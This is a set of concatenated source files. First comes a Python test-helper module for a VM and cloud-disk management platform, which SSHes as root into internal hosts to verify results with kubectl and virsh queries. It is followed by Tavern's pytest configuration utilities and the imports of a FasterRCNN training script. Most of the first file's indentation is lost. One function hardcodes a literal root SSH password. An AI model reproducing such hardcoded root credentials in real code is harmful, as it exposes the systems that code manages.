for row in verify_rows:
if keyword in row.get(searchtype_dict.get(searchtype)):
num += 1
local_rows = response.json().get("rows")
for row in local_rows:
assert keyword in row.get(searchtype_dict.get(searchtype))
continue
assert len(local_rows) == num
def search_vmip_list(keyword):
des_url = "http://172.16.130.254:38080/networkCard/query.do"
vm_list = get_value("rows")
#print(vm_list, "8"*10)
vmid_list = [i.get("vmid") for i in vm_list]
result = 0
cookie = login()
for vmid in vmid_list:
params = {
"order": "asc",
"offset": 0,
"limit": 20,
"vmid": vmid
}
res = requests.get(des_url, params=params,
headers={"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Cookie": cookie})
#print(res.json())
rows = res.json().get("rows")
for row in rows:
if keyword in row.get("ip"):
result += 1
return result
def check_query_vm_ip_ok(response, keyword):
cmp_num = search_vmip_list(keyword=keyword)
rows = response.json().get("rows")
#print(cmp_num, "hhhhhhh")
#print(len(rows))
assert len(rows) == cmp_num
def check_reboot_vm_ok(response):
assert response.json().get("code") == 1
def check_pause_forceStop_stop_ok(response, state, hostip):
vmid = response.json().get("id")
username = "root"
password = "<PASSWORD>"
ip = hostip
cmd = 'virsh list --all|grep {0}|grep -E "{1}"|wc -l'.format(state, vmid)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(ret):
# print(1111)
flag = True
break
assert flag
des_url = "http://172.16.130.254:38080/networkCard/query.do"
params = {
"order": "asc",
"offset": 0,
"limit": 20,
"searchtype": 0,
"keyword": None,
"state": None,
}
cookie = login()
res = requests.get(des_url, params=params,
headers={"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Cookie": cookie})
# print(res.json())
rows = res.json().get("rows")
if state == "shut":
st = "stopped"
elif state == "paused":
st = state
else:
st = "running"
for row in rows:
if row.get("vmid") == vmid:
assert row.get("state") == st
def check_all_vm_stop(response, ids):
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
for i in ids.split(","):
cmd = 'kubectl get vm|grep {0}|grep -i shut|wc -l'.format(i)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if not (int(ret) - 3):
# print(1111)
flag = True
break
assert flag
def check_cloudDisk_add_ok(response, template=0):
id = response.json().get("id")
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
if template:
cmd = 'find /var/lib/libvirt/cstor/ -name {0}|wc -l'.format(id)
else:
cmd = 'kubectl get vmd|grep {0}|wc -l'.format(id)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(ret):
# print(1111)
flag = True
break
assert flag
def check_cloudDiskLoad_or_unload_ok(response, vmid, volumeid, typee=1):
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
cmd = 'kubectl get vm {0} -o yaml|grep {1}|wc -l'.format(vmid, volumeid)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if typee:
if int(ret):
# print(1111)
flag = True
break
else:
if not int(ret):
# print(1111)
flag = True
break
assert flag
def check_cloudDisk_queryImageserver_ok(response):
rows = response.json().get("rows")
for row in rows:
assert row.get("state") == 1
def check_cloudDisk_snapshot_add_ok(response):
id = response.json().get('id')
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
cmd = 'kubectl get vmd|grep {0}|wc -l'.format(id)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(ret):
flag = True
break
assert flag
def check_cloudDisk_setQos_ok(response, vmid, rx, tx):
assert response.json().get("id")
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
for i in [rx, tx]:
cmd = "kubectl get vm {0} -i yaml|grep 'text: {1}'|wc -l".format(vmid, i*1024*1024)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(ret):
flag = True
break
assert flag
def check_cloudDisk_cancleQos_ok(response, vmid):
assert response.json().get("id")
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
cmd = "kubectl get vm {0} -i yaml|grep -E 'write|read'|wc -l".format(vmid)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(ret):
flag = True
break
assert flag
def check_cloudDisk_expandVol_ok(response, installpath, size, hostip):
assert response.json().get("id")
username = "root"
password = "<PASSWORD>"
ip = hostip
cmd = "qume-img info %s|grep virtual|awk '{print $3}'" % (installpath,)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if str(ret) == size:
flag = True
break
assert flag
# This function was meant to verify the list of selectable physical machines for a storage
# migration, but the backend does not pass clusterid, so it cannot be verified here.
def verify_query_cluster_all_phymachine_ok(response):
pass
def check_cloudDisk_migrate_ok(response, installpath, pmip, msurl, msname):
cloudDiskId = response.json().get("resourceIds")[0]
username = "root"
password = "<PASSWORD>"
ip = pmip
cmd = "kubectl get vmd|grep %s|awk '{print $3}'" % (cloudDiskId,)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if msurl in str(ret) and (msurl not in installpath):
flag = True
break
assert flag
des_url = "http://172.16.130.254:38080/cloudDisk/query.do"
params = {
"order": "asc",
"offset": 0,
"limit": 20,
"searchtype": 0,
"keyword": None,
"state": None,
}
cookie = login()
res = requests.get(des_url, params=params,
headers={"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Cookie": cookie})
# print(res.json())
rows = res.json().get("rows")
for row in rows:
if row.get("volumeid") == cloudDiskId:
assert row.get("msname") == msname
break
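# Illustrative sketch only: the cookie-authenticated GET used by several checks above
# could be shared. `login()` and the headers are taken from the surrounding code; the
# helper name is an assumption, not part of the original module.
def api_query_rows(url, params):
    """Query a management-API endpoint and return its `rows` payload."""
    cookie = login()
    res = requests.get(url, params=params,
                       headers={"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
                                "Cookie": cookie})
    return res.json().get("rows")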
def check_query_cloudHost_loadable_or_unloadable_disk_ok(response, vmid, load=1):
if load:
sql_result = Query()("SELECT * FROM `cl_volume_inf` where STATE = 0 and VMID is null;")
else:
sql_result = Query()('SELECT * FROM `cl_volume_inf` where VMID="{0}" and TYPE=2;'.format(vmid,))
sql_volid_list = [x.get("VOLUMEID") for x in sql_result]
json_volid_list = [x.get("volumeid") for x in response.json().get("rows")]
assert len(sql_volid_list) == len(json_volid_list)
for volid in sql_volid_list:
assert volid in json_volid_list
def check_cloudHost_setHa_ok(response, vmid, hostip, cancle=0):
username = "root"
password = "<PASSWORD>"
ip = hostip
cmd = 'kubectl get vm {0} -o yaml|grep -w ha|wc -l'.format(vmid)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if not cancle:
if int(ret):
flag = True
break
else:
if not int(ret):
flag = True
break
assert flag
def check_cloudHost_makeSnapshot_ok(response, vmid, hostip):
id = response.json().get("id")
assert id
username = "root"
password = "<PASSWORD>"
ip = hostip
cmd = 'kubectl get vmd|grep {0}|wc -l'.format(vmid)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(ret):
flag = True
break
assert flag
def check_makeVMimage_ok(response, hostip):
id = response.json().get("id")
assert id
username = "root"
password = "<PASSWORD>"
ip = hostip
cmd = 'find / -name {0}|wc -l'.format(id)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(ret):
flag = True
break
assert flag
def check_modify_cpu_num_ok(response, cpunum_new, hostip):
id = response.json().get("id")
assert id
username = "root"
password = "<PASSWORD>"
ip = hostip
cmd = "virsh vcpucount %s|grep current|awk '{print $3}'|tail -1" % (id,)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(ret) == cpunum_new:
flag = True
break
assert flag
def check_modify_mem_ok(response, memorysize, hostip):
#print(11111111111111111111111111111111111111111)
#print(response.json())
id = response.json().get("id")
#print("this is id....", id)
assert id
username = "root"
password = "<PASSWORD>"
ip = hostip
cmd = "virsh dominfo %s|grep Use|awk '{print $3}'" % (id,)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(int(ret)/(1024*1024)) == memorysize:
flag = True
break
assert flag
def check_query_cmrom_iso(response, vmid):
mirrorid_list = Query()('SELECT MIRRORID FROM `cl_mirror_inf` WHERE status=1 and MFORMAT="iso" AND '
'DOMAINID=(SELECT DOMAINID FROM `cl_vm_inf` WHERE VMID="{0}") '
'AND MIRRORID NOT IN (SELECT ISOID FROM `cl_vmcdrom_inf` WHERE'
' VMID="{1}")'.format(vmid, vmid))
rows = response.json().get("rows")
assert len(mirrorid_list) == len(rows)
for row in rows:
assert row.get("mirrorid") in mirrorid_list
def check_addCdrom_ok(vmid, mirrorid, hostip):
username = "root"
password = "user@dev"
ip = hostip
cmd = "kubectl get vm {0} -o yaml|grep {1}.iso|wc -l".format(vmid, mirrorid)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
print("this is flag...", flag)
if int(ret):
flag = True
break
assert flag
def check_changeBootSequence_ok(response, vmid, bootSeq, hostip):
assert response.json().get("id")
username = "root"
password = "<PASSWORD>"
ip = hostip
cmd = "kubectl get vm {0} -o yaml|grep order|cut -d: -f 2".format(vmid, )
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(180, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
ret = ret.decode("utf-8").replace("\n", "").replace(" ", "")
if bootSeq == 1:
if ret == "12":
flag = True
break
elif bootSeq == 2:
if ret == "21":
flag = True
break
assert flag
def check_changeSystem_querySystem_ok(response, vmid):
mirrorid_list = Query()('SELECT MIRRORID FROM `cl_mirror_inf` WHERE status=1 and MFORMAT!="iso" AND '
'DOMAINID=(SELECT DOMAINID FROM `cl_vm_inf` WHERE VMID="{0}") '
'AND MIRRORID NOT IN (SELECT ISOID FROM `cl_vmcdrom_inf` WHERE'
' VMID="{1}")'.format(vmid, vmid))
rows = response.json().get("rows")
assert len(mirrorid_list) == len(rows)
for row in rows:
assert row.get("mirrorid") in mirrorid_list
def check_changeOs_ok(response, template_url, rootvolumeid, hostip):
username = "root"
password = "<PASSWORD>"
ip = hostip
cmd = "diff %s `kubectl get vmd %s|tail -1|awk '{print $3}'`|wc -l" % (template_url, rootvolumeid)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(30, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
print("this is flag...", flag)
if not int(ret):
flag = True
break
assert flag
def check_delete_mirror_all_ok(response):
print(response.json())
def check_delete_mirrorServer_ok(response, mirrorServerId):
print(response.json())
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
cmd = "kubectl get vmp|grep {0}|wc -l".format(mirrorServerId)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(30, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
print("this is flag...", flag)
if not int(ret):
flag = True
break
assert flag
def check_delete_all_resource_ok(response, flag="vm"):
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
ids = response.json().get("id")
ids_list = ids.split(",")
for id in ids_list:
if flag == "vm":
cmd = "kubectl get vm|grep {0}|wc -l".format(id)
else:
cmd = "kubectl get vmp|grep {0}|wc -l".format(id)
        ok = False  # separate name so the `flag` argument is not clobbered on later iterations
        eventlet.monkey_patch()
        with eventlet.Timeout(30, False):
            while 1:
                time.sleep(0.5)
                ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
                if not int(ret):
                    ok = True
                    break
        assert ok
def check_delete_net(response, l2vmn_num=2):
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
cmd = "kubectl get vmn|grep l2network|wc -l"
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(30, False):
while 1:
time.sleep(0.5)
try:
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
ret = int(ret)
except Exception:
flag = True
break
if int(l2vmn_num) - ret == 2:
flag = True
break
assert flag
#l2vmn check
def check_creat_net_ok(response, l2vmn_num=0):
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
cmd = "kubectl get vmn|grep l2network|wc -l"
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(30, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(ret) - int(l2vmn_num) == 2:
flag = True
break
assert flag
def check_creat_l3_net_ok(response):
id = response.json().get("id")
assert id
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
cmd = "kubectl get vmn|grep {0}|wc -l".format(id)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(30, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(ret):
flag = True
break
assert flag
def check_creat_vxlanPool_ok(response, pool_name):
#print(response)
try:
code = response.json().get("code")
if "1" in pool_name:
assert -1 == code
else:
assert 1 == code
except Exception as e:
print(e)
assert True
def check_add_vxlan_vni_ok(response, flag):
print(response.json())
if 3 == flag:
assert response.json().get("code") == 1
if 2 == flag:
assert response.json().get("code") == -1
if 1 == flag:
assert response.json().get("code") == -1
def check_delete_vni_range_ok(response, vni_list, vnistart, endvni):
    # deleting a VNI that falls inside an allocated range must be rejected (code -1)
    for vni in vni_list.split(","):
        if int(vni) in range(int(vnistart), int(endvni) + 1):
            assert -1 == response.json().get("code")
            return
    assert 1 == response.json().get("code")
def check_delete_vxlan_net_ok(response, vni, vxlan_clusterid_list):
assert response.json().get("code") == 1
#print(vxlan_clusterid_list)
#print(7777777777777777777777777)
try:
vxlan_clusterid_list = json.loads(vxlan_clusterid_list)
except Exception:
vxlan_clusterid_list = tuple(vxlan_clusterid_list.split(","))
#print(vxlan_clusterid_list)
#print(66666666666666)
if len(vxlan_clusterid_list) > 1:
sql_cmd = 'SELECT HOSTIP FROM `cl_host_inf` WHERE STATE=1 AND DELETED=0 AND `STATUS`="Ready" and CLUSTERID IN {0};'.format(str(vxlan_clusterid_list))
else:
sql_cmd = 'SELECT HOSTIP FROM `cl_host_inf` WHERE STATE=1 AND DELETED=0 AND `STATUS`="Ready" and CLUSTERID="{0}";'.format(vxlan_clusterid_list[0])
#print(sql_cmd)
#print(555555555555555555555)
result = Query()(sql_cmd)
ip_list = []
for re in result:
ip_list.append(re.get("HOSTIP"))
username = "root"
password = "<PASSWORD>"
for ip in ip_list:
cmd = "ovs-vsctl list-br|grep vx{0}|wc -l".format(vni)
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(30, False):
while 1:
time.sleep(0.1)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if not int(ret):
flag = True
break
assert flag
def check_modify_l3network_mtu(response, mtu):
id = response.json().get("id")
cmd = "ovn-nbctl dhcp-options-get-options `ovn-nbctl show %s|grep dhcp|awk -F\"-\" '{print $3\"-\"$4\"-\"$5\"-\"$6\"-\"$7}'`|grep mtu|cut -d\"=\" -f2" % (id,)
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(30, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(ret) == int(mtu):
flag = True
break
assert flag
def check_l3network_add_dns(response, mtu, rows, nid, dns_addr):
cmd = "ovn-nbctl dhcp-options-get-options `ovn-nbctl show %s|grep dhcp|awk -F\"-\" '{print $3\"-\"$4\"-\"$5\"-\"$6\"-\"$7}'`|grep -E 'mtu|dns'|sed ':a;N;s/\n/\t/;ba;'" % (nid,)
dns_list = [row.get("dns") for row in rows]
re_mtu = 0
re_dns_list = []
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(30, False):
while 1:
time.sleep(0.2)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
tp_str = ret.split()
for i in tp_str:
if "mtu" in i:
re_mtu = int(i.split("=")[1])
elif "dns" in i:
if "," in i:
re_dns_list = i[12:-1].split(",")
else:
re_dns_list.append(i.split("=")[1])
assert int(mtu) == re_mtu
assert dns_addr in re_dns_list
flag_2 = True
for dns in dns_list:
if dns not in re_dns_list:
flag_2 = False
break
if flag_2:
flag = True
break
assert flag
def check_vpc_network_add_ok(response):
id = response.json().get("id")
assert id
cmd = "kubectl get vmn|grep {0}|wc -l".format(id,)
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(40, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if 1 == int(ret):
flag = True
break
assert flag
def check_vpc_router_stop_or_start(response):
id = response.json().get("id")
cmd = "kubectl get vm|grep {0}|grep -i shut|wc -l".format(id, )
username = "root"
password = "<PASSWORD>"
ip = "172.16.130.254"
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(100, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if 1 == int(ret):
flag = True
break
assert flag
def check_setConsolePasswd_ok(response, hostip, passwd=None):
id = response.json().get("id")
if passwd:
cmd = 'cat /tmp/%s.xml |grep passwd|awk -F"passwd=" \'{print $2}\'|cut -d"\"" -f2' % (id,)
else:
cmd = 'cat /tmp/%s.xml |grep passwd|wc -l' % (id,)
username = "root"
password = "<PASSWORD>"
ip = hostip
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(30, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if passwd:
if ret == str(passwd):
flag = True
break
else:
if not int(ret):
flag = True
break
assert flag
def check_modifyCpuNum_ok(response, hostip, cpunum):
id = response.json().get("id")
cmd = "virsh vcpucount %s|grep current|grep live|awk '{print $3}'" % (id,)
username = "root"
password = "<PASSWORD>"
ip = hostip
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(30, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(ret) == int(cpunum):
flag = True
break
assert flag
def check_modifyVpcMem_ok(response, memory, hostip):
id = response.json().get("id")
cmd = "virsh dominfo %s|grep 'Used mem'|awk '{print $3}'" % (id,)
username = "root"
password = "<PASSWORD>"
ip = hostip
flag = False
eventlet.monkey_patch()
with eventlet.Timeout(30, False):
while 1:
time.sleep(0.5)
ret = sshClient.tunction(ip=ip, username=username, password=password, cmd=cmd)
if int(ret)/(1024*1024) == int(memory):
flag = True
break
assert flag
``` |
{
"source": "13242084001/tavern",
"score": 2
} |
#### File: testutils/pytesthook/util.py
```python
from functools import lru_cache
import logging
import os
from box import Box
from tavern.util.dict_util import format_keys
from tavern.util.general import load_global_config
from tavern.util.strict_util import StrictLevel
logger = logging.getLogger(__name__)
def add_parser_options(parser_addoption, with_defaults=True):
"""Add argparse options
This is shared between the CLI and pytest (for now)
See also testutils.pytesthook.hooks.pytest_addoption
"""
parser_addoption(
"--tavern-global-cfg",
help="One or more global configuration files to include in every test",
nargs="+",
)
parser_addoption(
"--tavern-http-backend",
help="Which http backend to use",
default="requests" if with_defaults else None,
)
parser_addoption(
"--tavern-mqtt-backend",
help="Which mqtt backend to use",
default="paho-mqtt" if with_defaults else None,
)
parser_addoption(
"--tavern-strict",
help="Default response matching strictness",
default=None,
nargs="+",
choices=["json", "headers", "redirect_query_params"],
)
parser_addoption(
"--tavern-use-default-traceback",
help="Use normal python-style traceback",
default=False,
action="store_true",
)
parser_addoption(
"--tavern-always-follow-redirects",
help="Always follow HTTP redirects",
default=False,
action="store_true",
)
parser_addoption(
"--tavern-file-path-regex",
help="Regex to search for Tavern YAML test files",
default=r".+\.tavern\.ya?ml$",
action="store",
nargs=1,
)
parser_addoption(
"--tavern-merge-ext-function-values",
help="Merge values from external functions in http requests",
default=False,
action="store_true",
)
def add_ini_options(parser):
"""Add an option to pass in a global config file for tavern
See also testutils.pytesthook.util.add_parser_options
"""
parser.addini(
"tavern-global-cfg",
help="One or more global configuration files to include in every test",
type="linelist",
default=[],
)
parser.addini(
"tavern-http-backend", help="Which http backend to use", default="requests"
)
parser.addini(
"tavern-mqtt-backend", help="Which mqtt backend to use", default="paho-mqtt"
)
parser.addini(
"tavern-strict",
help="Default response matching strictness",
type="args",
default=None,
)
parser.addini(
"tavern-use-default-traceback",
help="Use normal python-style traceback",
type="bool",
default=False,
)
parser.addini(
"tavern-always-follow-redirects",
help="Always follow HTTP redirects",
type="bool",
default=False,
)
parser.addini(
"tavern-file-path-regex",
help="Regex to search for Tavern YAML test files",
default=r".+\.tavern\.ya?ml$",
type="args",
)
parser.addini(
"tavern-merge-ext-function-values",
help="Merge values from external functions in http requests",
default=False,
type="bool",
)
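# Example pytest.ini snippet these options map to (illustrative values, not from the
# original project; the option names come from the addini/addoption calls above):
#
#   [pytest]
#   tavern-global-cfg =
#       common.yaml
#   tavern-strict = json
#   tavern-always-follow-redirects = true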
@lru_cache()
def load_global_cfg(pytest_config):
"""Load globally included config files from cmdline/cfg file arguments
Args:
pytest_config (pytest.Config): Pytest config object
Returns:
dict: variables/stages/etc from global config files
Raises:
exceptions.UnexpectedKeysError: Invalid settings in one or more config
files detected
"""
# Load ini first
ini_global_cfg_paths = pytest_config.getini("tavern-global-cfg") or []
# THEN load command line, to allow overwriting of values
cmdline_global_cfg_paths = pytest_config.getoption("tavern_global_cfg") or []
all_paths = ini_global_cfg_paths + cmdline_global_cfg_paths
global_cfg = load_global_config(all_paths)
try:
loaded_variables = global_cfg["variables"]
except KeyError:
logger.debug("Nothing to format in global config files")
else:
tavern_box = Box({"tavern": {"env_vars": dict(os.environ)}})
global_cfg["variables"] = format_keys(loaded_variables, tavern_box)
# Can be overridden in tests
global_cfg["strict"] = _load_global_strictness(pytest_config)
global_cfg["follow_redirects"] = _load_global_follow_redirects(pytest_config)
global_cfg["backends"] = _load_global_backends(pytest_config)
global_cfg["merge_ext_values"] = _load_global_merge_ext(pytest_config)
logger.debug("Global config: %s", global_cfg)
return global_cfg
def _load_global_backends(pytest_config):
"""Load which backend should be used"""
backend_settings = {}
backends = ["http", "mqtt"]
for b in backends:
backend_settings[b] = get_option_generic(
pytest_config, "tavern-{}-backend".format(b), None
)
return backend_settings
def _load_global_strictness(pytest_config):
"""Load the global 'strictness' setting"""
options = get_option_generic(pytest_config, "tavern-strict", [])
return StrictLevel.from_options(options)
def _load_global_follow_redirects(pytest_config):
"""Load the global 'follow redirects' setting"""
return get_option_generic(pytest_config, "tavern-always-follow-redirects", False)
def _load_global_merge_ext(pytest_config):
"""Load the global setting about whether external values should be merged or not"""
return get_option_generic(pytest_config, "tavern-merge-ext-function-values", True)
def get_option_generic(pytest_config, flag, default):
"""Get a configuration option or return the default
Priority order is cmdline, then ini, then default"""
cli_flag = flag.replace("-", "_")
ini_flag = flag
# Lowest priority
use = default
# Middle priority
if pytest_config.getini(ini_flag) is not None:
use = pytest_config.getini(ini_flag)
# Top priority
if pytest_config.getoption(cli_flag) is not None:
use = pytest_config.getoption(cli_flag)
return use
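# Minimal sketch of the cmdline > ini > default priority implemented above.
# `_FakeConfig` and `_demo_priority` are assumptions for illustration only; real code
# receives a pytest.Config object.
class _FakeConfig:
    def __init__(self, ini=None, cli=None):
        self._ini, self._cli = ini, cli
    def getini(self, name):
        return self._ini
    def getoption(self, name):
        return self._cli
def _demo_priority():
    assert get_option_generic(_FakeConfig(), "tavern-strict", "default") == "default"
    assert get_option_generic(_FakeConfig(ini="ini"), "tavern-strict", "default") == "ini"
    assert get_option_generic(_FakeConfig(ini="ini", cli="cli"), "tavern-strict", "default") == "cli"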
``` |
{
"source": "13263081188/torch-cam",
"score": 3
} |
#### File: torch-cam/latent_cam/utils.py
```python
import numpy as np
from matplotlib import cm
from PIL import Image
def overlay_mask(img: Image.Image, mask: Image.Image, colormap: str = 'jet', alpha: float = 0.7) -> Image.Image:
"""Overlay a colormapped mask on a background image
Args:
img: background image
mask: mask to be overlayed in grayscale
colormap: colormap to be applied on the mask
alpha: transparency of the background image
Returns:
overlayed image
"""
if not isinstance(img, Image.Image) or not isinstance(mask, Image.Image):
raise TypeError('img and mask arguments need to be PIL.Image')
if not isinstance(alpha, float) or alpha < 0 or alpha >= 1:
raise ValueError('alpha argument is expected to be of type float between 0 and 1')
cmap = cm.get_cmap(colormap)
# Resize mask and apply colormap
overlay = mask.resize(img.size, resample=Image.BICUBIC)
overlay = (255 * cmap(np.asarray(overlay) ** 2)[:, :, :3]).astype(np.uint8)
# Overlay the image with the mask
overlayed_img = Image.fromarray((alpha * np.asarray(img) + (1 - alpha) * overlay).astype(np.uint8))
return overlayed_img
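# Hypothetical usage sketch (the file names and the 'viridis' colormap are assumptions):
# overlay a grayscale activation map on a background image and save the result.
if __name__ == '__main__':
    background = Image.open('dog.jpg').convert('RGB')
    activation = Image.open('cam.png').convert('L')  # grayscale mask
    result = overlay_mask(background, activation, colormap='viridis', alpha=0.6)
    result.save('overlay.png')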
``` |
{
"source": "13263081188/VISUAL_1",
"score": 2
} |
#### File: VISUAL_1/test/test_cams_core.py
```python
import pytest
import torch
from torchcam.cams import core
def test_cam_constructor(mock_img_model):
model = mock_img_model.eval()
# Check that wrong target_layer raises an error
with pytest.raises(ValueError):
_ = core._CAM(model, '3')
def test_cam_precheck(mock_img_model, mock_img_tensor):
model = mock_img_model.eval()
extractor = core._CAM(model, '0.3')
with torch.no_grad():
# Check missing forward raises Error
with pytest.raises(AssertionError):
extractor(0)
# Check that a batch of 2 cannot be accepted
_ = model(torch.cat((mock_img_tensor, mock_img_tensor)))
with pytest.raises(ValueError):
extractor(0)
# Correct forward
_ = model(mock_img_tensor)
# Check incorrect class index
with pytest.raises(ValueError):
extractor(-1)
# Check missing score
if extractor._score_used:
with pytest.raises(ValueError):
extractor(0)
@pytest.mark.parametrize(
"input_shape, spatial_dims",
[
[(8, 8), None],
[(8, 8, 8), None],
[(8, 8, 8), 2],
[(8, 8, 8, 8), None],
[(8, 8, 8, 8), 3],
],
)
def test_cam_normalize(input_shape, spatial_dims):
input_tensor = torch.rand(input_shape)
normalized_tensor = core._CAM._normalize(input_tensor, spatial_dims)
# Shape check
assert normalized_tensor.shape == input_shape
# Value check
assert not torch.any(torch.isnan(normalized_tensor))
assert torch.all(normalized_tensor <= 1) and torch.all(normalized_tensor >= 0)
def test_cam_clear_hooks(mock_img_model):
model = mock_img_model.eval()
extractor = core._CAM(model, '0.3')
assert len(extractor.hook_handles) == 1
# Check that there is only one hook on the model
assert extractor.hook_a is None
with torch.no_grad():
_ = model(torch.rand((1, 3, 32, 32)))
assert extractor.hook_a is not None
# Remove it
extractor.clear_hooks()
assert len(extractor.hook_handles) == 0
# Check that there is no hook anymore
extractor.hook_a = None
with torch.no_grad():
_ = model(torch.rand((1, 3, 32, 32)))
assert extractor.hook_a is None
def test_cam_repr(mock_img_model):
model = mock_img_model.eval()
extractor = core._CAM(model, '0.3')
assert repr(extractor) == "_CAM(target_layer='0.3')"
``` |
{
"source": "13266828291/tensorpack",
"score": 2
} |
#### File: examples/FasterRCNN/train.py
```python
import os
import argparse
import cv2
import shutil
import itertools
import tqdm
import numpy as np
import json
import six
import tensorflow as tf
try:
import horovod.tensorflow as hvd
except ImportError:
pass
assert six.PY3, "FasterRCNN requires Python 3!"
from tensorpack import *
from tensorpack.tfutils.summary import add_moving_summary
from tensorpack.tfutils import optimizer
from tensorpack.tfutils.common import get_tf_version_tuple
import tensorpack.utils.viz as tpviz
from coco import COCODetection
from basemodel import (
image_preprocess, resnet_c4_backbone, resnet_conv5,
resnet_fpn_backbone)
import model_frcnn
import model_mrcnn
from model_frcnn import (
sample_fast_rcnn_targets, fastrcnn_outputs,
fastrcnn_predictions, BoxProposals, FastRCNNHead)
from model_mrcnn import maskrcnn_upXconv_head, maskrcnn_loss
from model_rpn import rpn_head, rpn_losses, generate_rpn_proposals
from model_fpn import (
fpn_model, multilevel_roi_align,
multilevel_rpn_losses, generate_fpn_proposals)
from model_cascade import CascadeRCNNHead
from model_box import (
clip_boxes, crop_and_resize, roi_align, RPNAnchors)
from data import (
get_train_dataflow, get_eval_dataflow,
get_all_anchors, get_all_anchors_fpn)
from viz import (
draw_annotation, draw_proposal_recall,
draw_predictions, draw_final_outputs)
from eval import (
eval_coco, multithread_eval_coco,
detect_one_image, print_coco_metrics, DetectionResult)
